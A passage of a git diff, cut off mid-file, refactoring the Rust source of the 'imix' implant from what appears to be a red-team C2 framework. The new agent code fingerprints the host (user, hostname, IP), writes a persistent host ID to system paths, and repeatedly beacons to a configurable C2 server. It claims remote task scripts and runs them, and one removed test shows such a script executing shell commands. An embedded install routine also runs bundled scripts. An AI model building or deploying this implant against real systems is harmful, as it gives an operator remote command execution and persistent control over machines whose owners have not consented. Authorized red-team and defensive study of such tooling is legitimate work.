100644 --- a/implants/golem/tests/cli.rs +++ b/implants/golem/tests/cli.rs @@ -32,7 +32,9 @@ fn test_golem_main_syntax_fail() -> anyhow::Result<()> { cmd.arg(format!("{GOLEM_CLI_TEST_DIR}syntax_fail.tome")); cmd.assert() .failure() - .stderr(predicate::str::contains(format!("[TASK ERROR] {GOLEM_CLI_TEST_DIR}syntax_fail.tome: [eldritch] Unable to parse eldritch tome: error: Parse error: unexpected string literal \"win\" here"))); + .stderr(predicate::str::contains(format!( + r#"Parse error: unexpected string literal "win" here"# + ))); Ok(()) } diff --git a/implants/imix/Cargo.toml b/implants/imix/Cargo.toml index d1a172046..47726f3f2 100644 --- a/implants/imix/Cargo.toml +++ b/implants/imix/Cargo.toml @@ -1,6 +1,6 @@ [package] name = "imix" -version = "0.0.4" +version = "0.0.5" edition = "2021" [dependencies] @@ -10,7 +10,9 @@ clap = { workspace = true } default-net = { workspace = true } eldritch = { workspace = true, features = ["imix"] } hyper = { workspace = true } +log = {workspace = true} openssl = { workspace = true, features = ["vendored"] } +pretty_env_logger = {workspace = true} prost-types = { workspace = true } rand = {workspace = true} reqwest = { workspace = true, features = ["blocking", "stream", "json"] } diff --git a/implants/imix/install_scripts/install_service/main.eld b/implants/imix/install_scripts/install_service/main.eldritch similarity index 100% rename from implants/imix/install_scripts/install_service/main.eld rename to implants/imix/install_scripts/install_service/main.eldritch diff --git a/implants/imix/src/agent.rs b/implants/imix/src/agent.rs new file mode 100644 index 000000000..f34662d99 --- /dev/null +++ b/implants/imix/src/agent.rs @@ -0,0 +1,127 @@ +use crate::{config::Config, task::TaskHandle}; +use anyhow::Result; +use c2::{ + pb::{Beacon, ClaimTasksRequest}, + TavernClient, +}; +use eldritch::Runtime; +use std::time::{Duration, Instant}; + +/* + * Agent contains all relevant logic for managing callbacks to a c2 server. + * It is responsible for obtaining tasks, executing them, and returning their output. + */ +pub struct Agent { + info: Beacon, + tavern: TavernClient, + handles: Vec, +} + +impl Agent { + /* + * Initialize an agent using the provided configuration. + */ + pub async fn gen_from_config(cfg: Config) -> Result { + let tavern = TavernClient::connect(cfg.callback_uri).await?; + + Ok(Agent { + info: cfg.info, + tavern, + handles: Vec::new(), + }) + } + + // Claim tasks and start their execution + async fn claim_tasks(&mut self) -> Result<()> { + let tasks = self + .tavern + .claim_tasks(ClaimTasksRequest { + beacon: Some(self.info.clone()), + }) + .await? + .into_inner() + .tasks; + + #[cfg(debug_assertions)] + log::info!("claimed {} tasks", tasks.len()); + + for task in tasks { + let tome = match task.tome { + Some(t) => t, + None => { + continue; + } + }; + + let (runtime, output) = Runtime::new(); + let handle = tokio::task::spawn_blocking(move || runtime.run(tome)); + self.handles.push(TaskHandle::new(task.id, output, handle)); + + #[cfg(debug_assertions)] + log::info!("spawned task execution for id={}", task.id); + } + Ok(()) + } + + // Report task output, remove completed tasks + async fn report(&mut self) -> Result<()> { + // Report output from each handle + let mut idx = 0; + while idx < self.handles.len() { + // Drop any handles that have completed + if self.handles[idx].is_finished() { + let mut handle = self.handles.remove(idx); + handle.report(&mut self.tavern).await?; + continue; + } + + // Otherwise report and increment + self.handles[idx].report(&mut self.tavern).await?; + idx += 1; + } + + Ok(()) + } + + /* + * Callback once using the configured client to claim new tasks and report available output. + */ + pub async fn callback(&mut self) -> Result<()> { + self.claim_tasks().await?; + self.report().await?; + + Ok(()) + } + + /* + * Callback indefinitely using the configured client to claim new tasks and report available output. + */ + pub async fn callback_loop(&mut self) { + loop { + let start = Instant::now(); + + match self.callback().await { + Ok(_) => {} + Err(_err) => { + #[cfg(debug_assertions)] + log::error!("callback failed: {}", _err); + } + }; + + let interval = self.info.interval.clone(); + let delay = match interval.checked_sub(start.elapsed().as_secs()) { + Some(secs) => Duration::from_secs(secs), + None => Duration::from_secs(0), + }; + + #[cfg(debug_assertions)] + log::info!( + "completed callback in {}s, sleeping for {}s", + start.elapsed().as_secs(), + delay.as_secs() + ); + + std::thread::sleep(delay); + } + } +} diff --git a/implants/imix/src/config.rs b/implants/imix/src/config.rs new file mode 100644 index 000000000..b9c3e77bc --- /dev/null +++ b/implants/imix/src/config.rs @@ -0,0 +1,202 @@ +use crate::version::VERSION; +use c2::pb::host::Platform; +use std::{ + fs::{self, File}, + io::Write, + path::Path, +}; +use uuid::Uuid; + +macro_rules! callback_uri { + () => { + match option_env!("IMIX_CALLBACK_URI") { + Some(uri) => uri, + None => "http://127.0.0.1:80/grpc", + } + }; +} +/* + * Compile-time constant for the agent callback URI, derived from the IMIX_CALLBACK_URI environment variable during compilation. + * Defaults to "http://127.0.0.1:80/grpc" if this is unset. + */ +pub const CALLBACK_URI: &'static str = callback_uri!(); + +macro_rules! callback_interval { + () => { + match option_env!("IMIX_CALLBACK_INTERVAL") { + Some(interval) => interval, + None => "5", + } + }; +} +/* Compile-time constant for the agent retry interval, derived from the IMIX_RETRY_INTERVAL environment variable during compilation. + * Defaults to 5 if unset. + */ +pub const CALLBACK_INTERVAL: &'static str = callback_interval!(); + +macro_rules! retry_interval { + () => { + match option_env!("IMIX_RETRY_INTERVAL") { + Some(interval) => interval, + None => "5", + } + }; +} +/* Compile-time constant for the agent callback interval, derived from the IMIX_CALLBACK_INTERVAL environment variable during compilation. + * Defaults to 5 if unset. + */ +pub const RETRY_INTERVAL: &'static str = retry_interval!(); + +/* + * Config holds values necessary to configure an Agent. + */ +#[derive(Debug, Clone)] +pub struct Config { + pub info: c2::pb::Beacon, + pub callback_uri: String, + pub retry_interval: u64, +} + +/* + * A default configuration for the agent. + */ +impl Default for Config { + fn default() -> Self { + let agent = c2::pb::Agent { + identifier: format!("imix-v{}", VERSION), + }; + + let host = c2::pb::Host { + name: whoami::hostname(), + identifier: get_host_id(get_host_id_path()), + platform: get_host_platform() as i32, + primary_ip: get_primary_ip(), + }; + + let info = c2::pb::Beacon { + identifier: String::from(Uuid::new_v4()), + principal: whoami::username(), + interval: match CALLBACK_INTERVAL.parse::() { + Ok(i) => i, + Err(_err) => { + #[cfg(debug_assertions)] + log::error!("failed to parse callback interval constant, defaulting to 5 seconds: {_err}"); + + 5 as u64 + } + }, + host: Some(host), + agent: Some(agent), + }; + + Config { + info, + callback_uri: String::from(CALLBACK_URI), + retry_interval: match RETRY_INTERVAL.parse::() { + Ok(i) => i, + Err(_err) => { + #[cfg(debug_assertions)] + log::error!( + "failed to parse retry interval constant, defaulting to 5 seconds: {_err}" + ); + + 5 as u64 + } + }, + } + } +} + +/* + * Returns which Platform imix has been compiled for. + */ +fn get_host_platform() -> Platform { + #[cfg(target_os = "linux")] + return Platform::Linux; + + #[cfg(target_os = "macos")] + return Platform::Macos; + + #[cfg(target_os = "windows")] + return Platform::Windows; + + #[cfg(any(target_os = "freebsd", target_os = "netbsd", target_os = "openbsd"))] + return Platform::Bsd; + + #[cfg(all( + not(target_os = "linux"), + not(target_os = "macos"), + not(target_os = "windows"), + not(target_os = "freebsd"), + not(target_os = "netbsd"), + not(target_os = "openbsd"), + ))] + return Platform::Unspecified; +} + +/* + * Returns a predefined path to the host id file based on the current platform. + */ +fn get_host_id_path() -> String { + #[cfg(target_os = "windows")] + return String::from("C:\\ProgramData\\system-id"); + + #[cfg(not(target_os = "windows"))] + return String::from("/etc/system-id"); +} + +/* + * Attempt to read a host-id from a predefined path on disk. + * If the file exist, it's value will be returned as the identifier. + * If the file does not exist, a new value will be generated and written to the file. + * If there is any failure reading / writing the file, the generated id is still returned. + */ +fn get_host_id(file_path: String) -> String { + // Read Existing Host ID + let path = Path::new(file_path.as_str()); + if path.exists() { + match fs::read_to_string(path) { + Ok(host_id) => return host_id.trim().to_string(), + Err(_) => {} + } + } + + // Generate New + let host_id = Uuid::new_v4().to_string(); + + // Save to file + match File::create(path) { + Ok(mut f) => match f.write_all(host_id.as_bytes()) { + Ok(_) => {} + Err(_err) => { + #[cfg(debug_assertions)] + log::error!("failed to write host id file: {_err}"); + } + }, + Err(_err) => { + #[cfg(debug_assertions)] + log::error!("failed to create host id file: {_err}"); + } + }; + + return host_id; +} + +/* + * Return the first IPv4 address of the default interface as a string. + * Returns the empty string otherwise. + */ +fn get_primary_ip() -> String { + match default_net::get_default_interface() { + Ok(default_interface) => match default_interface.ipv4.first() { + Some(ip) => ip.addr.to_string(), + None => String::from(""), + }, + Err(_err) => { + #[cfg(debug_assertions)] + log::error!("failed to get primary ip: {_err}"); + + String::from("") + } + } +} diff --git a/implants/imix/src/exec.rs b/implants/imix/src/exec.rs deleted file mode 100644 index 80a7d544a..000000000 --- a/implants/imix/src/exec.rs +++ /dev/null @@ -1,215 +0,0 @@ -use anyhow::{Error, Result}; -use c2::pb::Task; -use chrono::{DateTime, Utc}; -use eldritch::{eldritch_run, EldritchPrintHandler}; -use std::sync::mpsc::Receiver; -use std::sync::mpsc::Sender; -use std::thread; -use tokio::task::JoinHandle; -use tokio::time::Duration; - -pub struct AsyncTask { - pub future_join_handle: JoinHandle>, - pub start_time: DateTime, - pub grpc_task: Task, - pub print_reciever: Receiver, - pub error_reciever: Receiver, -} - -async fn handle_exec_tome( - task: Task, - print_channel_sender: Sender, -) -> Result<(String, String)> { - // TODO: Download auxillary files from CDN - - // Read a tome script - // let task_quest = match task.quest { - // Some(quest) => quest, - // None => return Ok(("".to_string(), format!("No quest associated for task ID: {}", task.id))), - // }; - - let print_handler = EldritchPrintHandler { - sender: print_channel_sender, - }; - - // Execute a tome script - let res = match thread::spawn(move || { - eldritch_run( - task.id.to_string(), - task.eldritch.clone(), - Some(task.parameters.clone()), - &print_handler, - ) - }) - .join() - { - Ok(local_thread_res) => local_thread_res, - Err(_) => todo!(), - }; - match res { - Ok(tome_output) => Ok((tome_output, "".to_string())), - Err(tome_error) => Ok(("".to_string(), tome_error.to_string())), - } -} - -pub async fn handle_exec_timeout_and_response( - task: Task, - print_channel_sender: Sender, - error_channel_sender: Sender, - timeout: Option, -) -> Result<(), Error> { - // Tasks will be forcebly stopped after 1 week. - let timeout_duration = timeout.unwrap_or_else(|| Duration::from_secs(60 * 60 * 24 * 7)); - - // Define a future for our execution task - let exec_future = handle_exec_tome(task.clone(), print_channel_sender.clone()); - // Execute that future with a timeout defined by the timeout argument. - let tome_result = match tokio::time::timeout(timeout_duration, exec_future).await { - Ok(res) => match res { - Ok(tome_result) => tome_result, - Err(tome_error) => ("".to_string(), tome_error.to_string()), - }, - Err(timer_elapsed) => ( - "".to_string(), - format!( - "Time elapsed task {} has been running for {} seconds", - task.id, - timer_elapsed.to_string() - ), - ), - }; - - print_channel_sender - .clone() - .send(format!("---[RESULT]----\n{}\n---------", tome_result.0))?; - print_channel_sender // Temporary - pending UI updates - .clone() - .send(format!("---[ERROR]----\n{}\n--------", tome_result.1))?; - error_channel_sender.clone().send(tome_result.1)?; - Ok(()) -} - -#[cfg(test)] -mod tests { - use crate::tasks::drain_sender; - - use super::{handle_exec_timeout_and_response, handle_exec_tome}; - use anyhow::Result; - use c2::pb::Task; - use std::collections::HashMap; - use std::sync::mpsc::channel; - use std::time::Duration; - - #[test] - fn imix_handle_exec_tome() -> Result<()> { - let test_tome_input = Task { - id: 123, - eldritch: r#" -print(sys.shell(input_params["cmd"])["stdout"]) -1"# - .to_string(), - parameters: HashMap::from([("cmd".to_string(), "echo hello_from_stdout".to_string())]), - file_names: Vec::new(), - quest_name: "test_quest".to_string(), - }; - - let runtime = tokio::runtime::Builder::new_multi_thread() - .enable_all() - .build() - .unwrap(); - - let (sender, receiver) = channel::(); - - let exec_future = handle_exec_tome(test_tome_input, sender.clone()); - let (eld_output, eld_error) = runtime.block_on(exec_future)?; - - let cmd_output = receiver.recv_timeout(Duration::from_millis(500))?; - assert!(cmd_output.contains("hello_from_stdout")); - assert_eq!(eld_output, "1".to_string()); - assert_eq!(eld_error, "".to_string()); - Ok(()) - } - - #[tokio::test] - async fn imix_handle_exec_tome_error() -> Result<()> { - let (print_sender, print_reciever) = channel::(); - let (error_sender, error_reciever) = channel::(); - let _res = handle_exec_timeout_and_response( - Task { - id: 123, - eldritch: r#"print(no_var) -"# - .to_string(), - parameters: HashMap::from([]), - file_names: Vec::from([]), - quest_name: "Poggers".to_string(), - }, - print_sender, - error_sender, - None, - ) - .await?; - - let task_channel_error = drain_sender(&error_reciever)?; - let _task_channel_output = drain_sender(&print_reciever)?; - - assert!(task_channel_error.contains(&"Variable `no_var` not found".to_string())); - Ok(()) - } - - // This test - // #[test] - // fn imix_handle_exec_tome_timeout() -> Result<()> { - // let test_tome_input = Task { - // id: 123, - // eldritch: r#" - // print("Hello_world") - // time.sleep(5) - // "# - // .to_string(), - // parameters: HashMap::new(), - // }; - - // let runtime: tokio::runtime::Runtime = tokio::runtime::Builder::new_multi_thread() - // .enable_all() - // .build() - // .unwrap(); - - // let (sender, receiver) = channel::(); - - // let start_time = Instant::now(); - // let exec_future = handle_exec_timeout_and_response( - // test_tome_input, - // sender.clone(), - // Some(Duration::from_secs(2)), - // ); - // runtime.block_on(exec_future)?; - // let end_time = Instant::now(); - // let mut index = 0; - // loop { - // let cmd_output = match receiver.recv_timeout(Duration::from_millis(800)) { - // Ok(local_res_string) => local_res_string, - // Err(local_err) => { - // match local_err.to_string().as_str() { - // "channel is empty and sending half is closed" => { - // break; - // } - // "timed out waiting on channel" => break, - // _ => eprint!("Error: {}", local_err), - // } - // break; - // } - // }; - // println!("eld_output: {}", cmd_output); - // index = index + 1; - // } - - // println!( - // "Diff {:?}", - // end_time.checked_duration_since(start_time).unwrap() - // ); - // assert!(end_time.checked_duration_since(start_time).unwrap() < Duration::from_secs(3)); - - // Ok(()) - // } -} diff --git a/implants/imix/src/init.rs b/implants/imix/src/init.rs deleted file mode 100644 index 681058b2f..000000000 --- a/implants/imix/src/init.rs +++ /dev/null @@ -1,306 +0,0 @@ -use anyhow::{Context, Result}; -use c2::pb::host::Platform; -use std::{ - fs::{self, File}, - io::Write, - path::Path, -}; -use sys_info::{linux_os_release, os_release}; -use uuid::Uuid; - -use crate::Config; - -#[derive(Clone, Debug)] -pub struct AgentProperties { - pub principal: String, - pub hostname: String, - pub beacon_id: String, - pub host_id: String, - pub primary_ip: Option, - pub agent_id: String, - pub host_platform: Platform, -} - -fn get_principal() -> Result { - Ok(whoami::username()) -} - -fn get_hostname() -> Result { - Ok(whoami::hostname()) -} - -fn get_beacon_id() -> Result { - let beacon_id = Uuid::new_v4(); - Ok(beacon_id.to_string()) -} - -fn get_host_id(host_id_file_path: String) -> Result { - let mut host_id = Uuid::new_v4().to_string(); - let host_id_file = Path::new(&host_id_file_path); - if host_id_file.exists() { - host_id = match fs::read_to_string(host_id_file) { - Ok(tmp_host_id) => tmp_host_id.trim().to_string(), - Err(_) => host_id, - }; - } else { - let mut host_id_file_obj = match File::create(host_id_file) { - Ok(tmp_file_obj) => tmp_file_obj, - Err(_) => return Ok(host_id), // An error occured don't save. Just go. - }; - match host_id_file_obj.write_all(host_id.as_bytes()) { - Ok(_) => {} // Don't care if write fails or not going to to send our generated one. - Err(_) => {} - } - } - Ok(host_id) -} - -fn get_primary_ip() -> Result { - let res = match default_net::get_default_interface() { - Ok(default_interface) => { - if default_interface.ipv4.len() > 0 { - default_interface - .ipv4 - .get(0) - .context("No ips found")? - .addr - .to_string() - } else { - "DANGER-UNKNOWN".to_string() - } - } - Err(_err) => { - #[cfg(debug_assertions)] - eprintln!("Error getting primary ip address:\n{_err}"); - "DANGER-UNKNOWN".to_string() - } - }; - Ok(res) -} - -fn get_host_platform() -> Result { - if cfg!(target_os = "linux") { - return Ok(Platform::Linux); - } else if cfg!(target_os = "windows") { - return Ok(Platform::Windows); - } else if cfg!(target_os = "macos") { - return Ok(Platform::Macos); - } else if cfg!(target_os = "freebsd") - || cfg!(target_os = "openbsd") - || cfg!(target_os = "netbsd") - { - return Ok(Platform::Bsd); - } else { - return Ok(Platform::Unspecified); - } -} - -fn _get_os_pretty_name() -> Result { - if cfg!(target_os = "linux") { - let linux_rel = linux_os_release()?; - let pretty_name = match linux_rel.pretty_name { - Some(local_pretty_name) => local_pretty_name, - None => "UNKNOWN-Linux".to_string(), - }; - return Ok(format!("{}", pretty_name)); - } else if cfg!(target_os = "windows") || cfg!(target_os = "macos") { - return Ok(os_release()?); - } else { - return Ok("UNKNOWN".to_string()); - } -} - -pub fn agent_init(config_path: String, host_id_path: String) -> Result<(AgentProperties, Config)> { - let config_file = - File::open(config_path.clone()).with_context(|| format!("Failed to open {config_path}"))?; - - let imix_config = serde_json::from_reader(config_file) - .with_context(|| format!("Failed to parse {config_path}"))?; - - let principal = match get_principal() { - Ok(username) => username, - Err(_error) => { - #[cfg(debug_assertions)] - eprintln!("Unable to get process username\n{}", _error); - "UNKNOWN".to_string() - } - }; - - let hostname = match get_hostname() { - Ok(tmp_hostname) => tmp_hostname, - Err(_error) => { - #[cfg(debug_assertions)] - eprintln!("Unable to get system hostname\n{}", _error); - "UNKNOWN".to_string() - } - }; - - let beacon_id = match get_beacon_id() { - Ok(tmp_beacon_id) => tmp_beacon_id, - Err(_error) => { - #[cfg(debug_assertions)] - eprintln!("Unable to get a random beacon id\n{}", _error); - "DANGER-UNKNOWN".to_string() - } - }; - - let agent_id = format!( - "{}-{}", - "imix", - option_env!("CARGO_PKG_VERSION").unwrap_or_else(|| "UNKNOWN") - ); - - let host_platform = match get_host_platform() { - Ok(tmp_host_platform) => tmp_host_platform, - Err(_error) => { - #[cfg(debug_assertions)] - eprintln!("Unable to get host platform id\n{}", _error); - Platform::Unspecified - } - }; - - let primary_ip = match get_primary_ip() { - Ok(tmp_primary_ip) => Some(tmp_primary_ip), - Err(_error) => { - #[cfg(debug_assertions)] - eprintln!("Unable to get primary ip\n{}", _error); - None - } - }; - - // let host_id_file = if cfg!(target_os = "windows") { - // "C:\\ProgramData\\system-id" - // } else { - // "/etc/system-id" - // } - // .to_string(); - - let host_id = match get_host_id(host_id_path) { - Ok(tmp_host_id) => tmp_host_id, - Err(_error) => { - #[cfg(debug_assertions)] - eprintln!("Unable to get or create a host id\n{}", _error); - "DANGER-UNKNOWN".to_string() - } - }; - - Ok(( - AgentProperties { - principal, - hostname, - beacon_id, - host_id, - primary_ip, - agent_id, - host_platform, - }, - imix_config, - )) -} - -#[cfg(test)] -mod tests { - use anyhow::Context; - use tempfile::NamedTempFile; - - use super::*; - - #[test] - fn imix_test_agent_init() -> Result<()> { - let mut tmp_file = NamedTempFile::new()?; - let tmp_path = tmp_file - .path() - .to_str() - .context("Failed to get path")? - .to_string(); - tmp_file.write_all( - r#"{ - "service_configs": [ - { - "name": "imix", - "description": "Imix c2 agent", - "executable_name": "imix", - "executable_args": "" - } - ], - "target_forward_connect_ip": "127.0.0.1", - "target_name": "test1234", - "callback_config": { - "interval": 4, - "jitter": 1, - "timeout": 4, - "c2_configs": [ - { - "priority": 1, - "uri": "http://127.0.0.1/grpc" - } - ] - } - } - "# - .as_bytes(), - )?; - let tmp_file = NamedTempFile::new()?; - let tmp_host_id = String::from(tmp_file.path().to_str().unwrap()); - - let (properties, _config) = agent_init(tmp_path.clone(), tmp_host_id.clone())?; - let (properties2, config2) = agent_init(tmp_path, tmp_host_id)?; - assert_eq!(properties.host_id, properties2.host_id); - assert_ne!(properties.beacon_id, properties2.beacon_id); - assert!(properties2.agent_id.contains("imix-")); - assert_eq!( - config2 - .callback_config - .c2_configs - .get(0) - .context("No callbacks configured")? - .uri, - "http://127.0.0.1/grpc" - ); - Ok(()) - } - - #[test] - fn imix_test_get_os_pretty_name() { - assert!(_get_os_pretty_name().is_ok()); - } - - #[test] - fn imix_test_get_principal() { - assert!(get_principal().is_ok()) - } - - #[test] - fn imix_test_get_hostname() { - assert!(get_hostname().is_ok()) - } - - #[test] - fn imix_test_get_beacon_id() { - assert!(get_beacon_id().is_ok()) - } - - #[test] - fn imix_test_get_host_id() -> Result<()> { - let tmp_file = NamedTempFile::new()?; - let tmp_path = tmp_file - .path() - .to_str() - .context("Failed to get path")? - .to_string(); - let host_id = get_host_id(tmp_path.clone())?; - let host_id2 = get_host_id(tmp_path)?; - assert_eq!(host_id, host_id2); - Ok(()) - } - - #[test] - fn imix_test_get_primary_ip() { - assert!(get_primary_ip().is_ok()) - } - - #[test] - fn imix_test_get_host_platform() { - assert!(get_host_platform().is_ok()) - } -} diff --git a/implants/imix/src/install.rs b/implants/imix/src/install.rs index 36b417954..2bf5478df 100644 --- a/implants/imix/src/install.rs +++ b/implants/imix/src/install.rs @@ -1,127 +1,81 @@ +use anyhow::{anyhow, Result}; +use eldritch::{pb::Tome, Runtime}; use std::collections::HashMap; -use std::thread; -use eldritch::{eldritch_run, StdPrintHandler}; +pub async fn install() { + #[cfg(debug_assertions)] + log::info!("starting installation"); -async fn execute_tomes_in_parallel( - tome_name_and_content: Vec<(String, String)>, - custom_config: Option<&str>, -) -> anyhow::Result<(i32, Vec)> { - let tome_parameters = match custom_config { - Some(config_path) => Some(HashMap::from([( - "custom_config".to_string(), - config_path.to_string(), - )])), - None => None, - }; - - // Queue async tasks - let mut all_tome_futures: Vec<(String, _)> = vec![]; - for tome_data in tome_name_and_content { - // let custom_config_string = custom_config.unwrap().to_string().to_owned(); - let local_tome_parameters = tome_parameters.clone(); - let tmp_row = ( - tome_data.0.clone().to_string(), - thread::spawn(move || { - eldritch_run( - tome_data.0, - tome_data.1, - local_tome_parameters, - &StdPrintHandler {}, - ) - }), - ); - all_tome_futures.push(tmp_row) - } - - let mut error_code = 0; - let mut result: Vec = Vec::new(); - for tome_task in all_tome_futures { - let tome_name: String = tome_task.0; - // Join our - let tome_result_thread_join = match tome_task.1.join() { - Ok(local_thread_join_res) => local_thread_join_res, - Err(_) => { - error_code = 1; - Err(anyhow::anyhow!("An error occured waiting for the tome thread to complete while executing {tome_name}.")) - } - }; - - match tome_result_thread_join { - Ok(local_tome_result) => result.push(local_tome_result), - Err(task_error) => { - error_code = 1; - eprintln!("[TASK ERROR] {tome_name}: {task_error}"); - } - } - } - Ok((error_code, result)) -} - -pub fn install_main(custom_config: Option<&str>) -> anyhow::Result<()> { - let mut tome_files_and_content: Vec<(String, String)> = Vec::new(); + // Iterate through all embedded files for embedded_file_path in eldritch::assets::Asset::iter() { let filename = match embedded_file_path.split(r#"/"#).last() { Some(local_filename) => local_filename, None => "", }; - println!("{}", embedded_file_path); + + #[cfg(debug_assertions)] + log::debug!("checking asset {embedded_file_path}"); + + // Evaluate all "main.eldritch" files if filename == "main.eldritch" { - let tome_path = embedded_file_path.to_string().clone(); - let tome_contents_extraction_result = - match eldritch::assets::Asset::get(embedded_file_path.as_ref()) { - Some(local_tome_content) => String::from_utf8(local_tome_content.data.to_vec()), - None => { - eprint!("Failed to extract eldritch script as string"); - Ok("".to_string()) - } - }; + // Read eldritch content from embedded file + #[cfg(debug_assertions)] + log::info!("loading tome {embedded_file_path}"); + let eldritch = match load_embedded_eldritch(embedded_file_path.to_string()) { + Ok(content) => content, + Err(_err) => { + #[cfg(debug_assertions)] + log::error!("failed to load install asset: {_err}"); - let tome_contents = match tome_contents_extraction_result { - Ok(local_tome_contents) => local_tome_contents, - Err(utf8_error) => { - eprint!("Failed to extract eldritch script as string {utf8_error}"); - "".to_string() + continue; } }; - tome_files_and_content.push((tome_path, tome_contents)) - } - } - let runtime = tokio::runtime::Builder::new_current_thread() - .enable_all() - .build() - .unwrap(); - let (_error_code, result) = match runtime.block_on(execute_tomes_in_parallel( - tome_files_and_content, - custom_config, - )) { - Ok(response) => response, - Err(error) => { - println!("Error executing tomes {:?}", error); - (-1, Vec::new()) - } - }; + // Run tome + #[cfg(debug_assertions)] + log::info!("running tome {embedded_file_path}"); + let (runtime, output) = Runtime::new(); + match tokio::task::spawn_blocking(move || { + runtime.run(Tome { + eldritch, + parameters: HashMap::new(), + file_names: Vec::new(), + }); + }) + .await + { + Ok(_) => {} + Err(_err) => { + #[cfg(debug_assertions)] + log::error!("failed waiting for tome execution: {}", _err); + } + } - if result.len() > 0 { - println!("{:?}", result); + let _output = output.collect().join(""); + #[cfg(debug_assertions)] + log::info!("{_output}"); + } } - Ok(()) } -#[cfg(test)] -mod tests { - use super::*; - #[tokio::test] - async fn imix_test_execute_tomes_in_parallel() -> anyhow::Result<()> { - let tome_files_and_content = [( - "test_hello.eldritch".to_string(), - "'hello world'".to_string(), - )]; - let (error_code, result) = - execute_tomes_in_parallel(tome_files_and_content.to_vec(), None).await?; - assert_eq!(error_code, 0); - assert!(result.contains(&"hello world".to_string())); - Ok(()) +fn load_embedded_eldritch(path: String) -> Result { + match eldritch::assets::Asset::get(path.as_ref()) { + Some(f) => Ok(String::from_utf8(f.data.to_vec())?), + + // { + // Ok(data) => data, + // Err(_err) => { + // #[cfg(debug_assertions)] + // log::error!("failed to load install asset: {_err}"); + + // return + // }, + // }, + None => { + #[cfg(debug_assertions)] + log::error!("no asset file at {}", path); + + return Err(anyhow!("no asset file at {}", path)); + } } } diff --git a/implants/imix/src/lib.rs b/implants/imix/src/lib.rs index 83ebc6ce6..3d99fb08c 100644 --- a/implants/imix/src/lib.rs +++ b/implants/imix/src/lib.rs @@ -1,56 +1,9 @@ -use serde::{Deserialize, Serialize}; - -pub mod exec; -pub mod init; -pub mod install; -pub mod tasks; - -#[derive(Debug)] -pub enum Error { - Io(std::io::Error), - SerdeJson(serde_json::Error), -} - -impl From for Error { - fn from(error: std::io::Error) -> Self { - Error::Io(error) - } -} - -impl From for Error { - fn from(error: serde_json::Error) -> Self { - Error::SerdeJson(error) - } -} - -#[derive(Serialize, Deserialize, Clone)] -pub struct C2Config { - pub uri: String, - pub priority: u8, -} - -#[derive(Serialize, Deserialize, Clone)] -pub struct ServiceConfig { - name: String, - description: String, - executable_name: String, - executable_args: String, -} - -#[derive(Serialize, Deserialize, Clone)] -pub struct CallbackConfig { - pub interval: u64, - pub jitter: u64, - pub timeout: u64, - pub c2_configs: Vec, -} - -#[derive(Serialize, Deserialize, Clone)] -pub struct Config { - pub target_name: String, - pub target_forward_connect_ip: String, - pub callback_config: CallbackConfig, - pub service_configs: Vec, -} - -pub type TaskID = i64; +mod agent; +mod config; +mod install; +mod task; +mod version; + +pub use agent::Agent; +pub use config::Config; +pub use install::install; diff --git a/implants/imix/src/main.rs b/implants/imix/src/main.rs index abbef4b40..d6defd867 100644 --- a/implants/imix/src/main.rs +++ b/implants/imix/src/main.rs @@ -1,429 +1,54 @@ use anyhow::Result; -use c2::pb::c2_manual_client::TavernClient; -use c2::pb::TaskOutput; -use clap::{arg, Command}; -use imix::exec::AsyncTask; -use imix::init::agent_init; -use imix::tasks::{start_new_tasks, submit_task_output}; -use imix::{install, tasks, Config, TaskID}; -use std::collections::HashMap; -use std::time::Instant; +use clap::Command; +use imix::{Agent, Config}; +use std::time::Duration; -fn get_callback_uri(imix_config: Config) -> Result { - Ok(imix_config.callback_config.c2_configs[0].uri.clone()) -} - -fn do_delay(interval: u64, loop_start_time: Instant) { - let time_to_sleep = interval - .checked_sub(loop_start_time.elapsed().as_secs()) - .unwrap_or_else(|| 0); - - #[cfg(debug_assertions)] - eprintln!( - "[{}]: Callback failed sleeping seconds {}", - (Instant::now() - loop_start_time).as_millis(), - time_to_sleep - ); - - std::thread::sleep(std::time::Duration::new(time_to_sleep as u64, 24601)); -} - -// Async handler for port scanning. -async fn main_loop(config_path: String, _loop_count_max: Option) -> Result<()> { +#[tokio::main(flavor = "multi_thread", worker_threads = 128)] +async fn main() { #[cfg(debug_assertions)] - let mut debug_loop_count: i32 = 0; - - // This hashmap tracks all tasks by their ID (key) and a tuple value: (future, channel_reciever) - // AKA Work queue - let mut all_exec_futures: HashMap = HashMap::new(); - // This hashmap tracks all tasks output - // AKA Results queue - let mut all_task_res_map: HashMap> = HashMap::new(); - - let host_id_file = if cfg!(target_os = "windows") { - "C:\\ProgramData\\system-id" - } else { - "/etc/system-id" + init_logging(); + + match Command::new("imix") + .subcommand(Command::new("install").about("Install imix")) + .get_matches() + .subcommand() + { + Some(("install", _)) => { + imix::install().await; + return; + } + _ => {} } - .to_string(); - - let (agent_properties, imix_config) = agent_init(config_path, host_id_file)?; loop { - // 0. Get loop start time - let _loop_start_time = Instant::now(); - + let cfg = Config::default(); + let retry_interval = cfg.retry_interval; #[cfg(debug_assertions)] - eprintln!("Get new tasks"); - - // 1. Pull down new tasks - // 1a) calculate callback uri - let cur_callback_uri = get_callback_uri(imix_config.clone())?; + log::info!("agent config initialized {:#?}", cfg.clone()); - // 1b) Setup the tavern client - let tavern_client = match TavernClient::connect(cur_callback_uri.clone()).await { - Ok(t) => t, + match run(cfg).await { + Ok(_) => {} Err(_err) => { #[cfg(debug_assertions)] - eprintln!("failed to create tavern client {}", _err); - do_delay(imix_config.callback_config.interval, _loop_start_time); - continue; - } - }; - - // 1c) Collect new tasks - #[cfg(debug_assertions)] - eprintln!( - "[{}]: collecting tasks", - (Instant::now() - _loop_start_time).as_millis() - ); - - let new_tasks = match tasks::get_new_tasks( - agent_properties.clone(), - imix_config.clone(), - tavern_client.clone(), - ) - .await - { - Ok(local_new_tasks) => local_new_tasks, - Err(_local_err) => { - #[cfg(debug_assertions)] - eprintln!( - "[{}]: Error getting new tasks {}", - (Instant::now() - _loop_start_time).as_millis(), - _local_err - ); - do_delay(imix_config.callback_config.interval, _loop_start_time); - continue; - } - }; - - // 2. Start new tasks - #[cfg(debug_assertions)] - eprintln!( - "[{}]: Starting {} new tasks", - (Instant::now() - _loop_start_time).as_millis(), - new_tasks.len() - ); - - match start_new_tasks(new_tasks, &mut all_exec_futures, _loop_start_time).await { - Ok(_is_ok) => {} - Err(_local_err) => { - #[cfg(debug_assertions)] - eprintln!( - "[{}]: Failed to start new tasks: {}", - (Instant::now() - _loop_start_time).as_millis(), - _local_err - ); - } - }; - - // 3. Sleep till callback time - let time_to_sleep = imix_config - .clone() - .callback_config - 